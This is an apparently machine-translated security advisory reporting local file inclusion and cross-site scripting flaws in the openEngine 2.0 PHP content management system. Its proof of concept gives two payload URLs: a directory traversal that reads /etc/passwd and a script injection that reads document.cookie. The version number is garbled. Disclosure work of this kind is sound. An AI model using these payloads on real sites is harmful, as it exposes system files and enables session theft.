openEngine 2.0 1 0 0 2 2 6 local file inclusion and cross-site scripting vulnerability-vulnerability warning-the black bar safety net

2010-11-17T00:00:00
ID MYHACK58:62201028368
Type myhack58
Reporter 佚名
Modified 2010-11-17T00:00:00

Description

openEngine is a use PHP to develop Web Content Management System openEngine 2.0 1 0 0 2 2 6 There is a local include and cross-site scripting vulnerability that could lead to sensitive information disclosure.

[+]info: ~~~~~~~~~ openEngine 2.0 1 0 0 2 2 6 LFI and XSS Vulnerabilities Vendor : http://www.openengine.de Advisory : http://secpod.org/blog/?p=152 http://secpod.org/advisories/SECPOD_Openengine_LFI_XSS_Vuln.txt Version : openEngine 2.0 1 0 0 2 2 6; other versions may also be affected. Download : http://www.openengine.de/download/openengine20_100226.zip Date : 11/16/2010

[+]poc: ~~~~~~~~~ * local file inclusion, http://localhost/cms/website.php?template=../../../../../../../../etc/passwd%00

  • XSS, http://localhost/cms/website.php?template=<script>alert(document. cookie)</script>

[+]Reference: ~~~~~~~~~ http://secpod.org/advisories/SECPOD_Openengine_LFI_XSS_Vuln.txt

From: the BugZone